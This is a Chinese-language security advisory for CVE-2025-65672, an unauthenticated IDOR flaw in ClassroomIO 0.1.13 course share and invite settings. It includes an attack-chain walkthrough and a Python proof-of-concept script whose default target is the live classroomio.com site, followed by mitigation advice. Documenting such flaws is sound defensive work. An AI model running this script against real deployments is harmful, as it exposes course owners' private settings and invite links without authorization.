CVE-2025-65672 | ClassroomIO 0.1.13 IDOR漏洞允许未授权访问课程设置

漏洞信息

漏洞编号

CVE-2025-65672

漏洞类型

IDOR（不安全的直接对象引用）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ClassroomIO 0.1.13

漏洞概述

CVE-2025-65672是ClassroomIO平台中发现的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于Insecure Direct Object Reference（IDOR，不安全的直接对象引用）类型，存在于ClassroomIO 0.1.13版本中。IDOR是一种经典的访问控制缺陷，当应用程序使用用户提供的输入直接访问对象而未进行充分的授权验证时就会发生此漏洞。攻击者可以利用此漏洞在无需任何认证的情况下，非法访问和操作用户的课程设置，包括共享和邀请功能。这意味着任何人都可以通过猜测或枚举课程标识符来访问他人的课程资源，获取敏感信息或执行未授权的操作。该漏洞的严重性在于其攻击复杂度低、无需认证即可利用，且对机密性造成高影响。

技术细节

IDOR漏洞的核心问题在于应用程序未对用户请求访问的对象进行所有权验证。在ClassroomIO 0.1.13中，当用户尝试访问特定课程的共享或邀请功能时，系统仅根据请求中的课程标识符（Course ID）直接返回相应资源，而没有验证当前用户是否有权访问该课程。攻击者可以通过以下方式利用此漏洞：1）首先识别或枚举有效的课程ID；2）构造恶意请求，将目标课程的ID作为参数；3）系统直接返回该课程的敏感设置信息，包括共享配置和邀请链接；4）攻击者可以进一步利用获取的信息进行未授权的操作。由于系统缺少基于角色的访问控制（RBAC）和对象级别的权限检查，攻击者可以在不需要任何认证凭证的情况下完成整个攻击过程。此漏洞的技术根源在于API设计时未遵循最小权限原则，且缺少对用户输入的充分验证。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标系统为ClassroomIO，并收集有效的课程标识符（Course ID），可以通过枚举、猜测或公开信息获取

STEP 2

步骤2

构造恶意请求：攻击者构造HTTP请求，目标指向/api/courses/{course_id}/share或/api/courses/{course_id}/invite端点

STEP 3

步骤3

发送未授权请求：攻击者在没有任何认证凭证的情况下发送请求到目标端点

STEP 4

步骤4

绕过访问控制：系统由于缺少对象级别的权限验证，直接返回目标课程的敏感设置信息

STEP 5

步骤5

数据窃取：攻击者获取课程的共享配置、邀请链接和其他敏感信息，可能导致数据泄露

STEP 6

步骤6

权限提升：攻击者利用获取的信息进一步执行未授权操作，如修改课程设置或冒充课程管理员

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-65672 PoC - ClassroomIO IDOR Vulnerability
import requests
import sys

target_url = "https://classroomio.com"
course_id = "TARGET_COURSE_ID"

def exploit_idor():
    """Exploit IDOR to access course settings without authorization"""
    
    # Step 1: Access course share settings via IDOR
    share_endpoint = f"{target_url}/api/courses/{course_id}/share"
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    print(f"[*] Exploiting IDOR vulnerability...")
    print(f"[*] Target: {share_endpoint}")
    
    # No authentication required - this is the vulnerability
    try:
        response = requests.get(share_endpoint, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Successfully accessed course settings!")
            print(f"[+] Response: {response.text}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

def access_invite_settings():
    """Access course invite settings without authorization"""
    
    invite_endpoint = f"{target_url}/api/courses/{course_id}/invite"
    
    headers = {
        "Content-Type": "application/json"
    }
    
    print(f"[*] Accessing invite settings: {invite_endpoint}")
    
    try:
        response = requests.get(invite_endpoint, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Invite settings accessed!")
            print(f"[+] Response: {response.text}")
            return True
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        course_id = sys.argv[1]
    
    exploit_idor()
    access_invite_settings()

影响范围

ClassroomIO 0.1.13

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）暂时禁用课程的共享和邀请功能；2）实施IP白名单限制访问；3）启用双因素认证增强账户安全；4）监控异常访问日志；5）限制API端点的访问频率；6）使用API网关进行请求过滤和认证验证。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65672
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65672
3 Details https://www.cvedetails.com/cve/CVE-2025-65672/
4 VulDB https://vuldb.com/cve/CVE-2025-65672
5 Link http://classroomio.com
6 Link https://github.com/Rivek619/CVE-2025-65672
7 Link https://github.com/classroomio/classroomio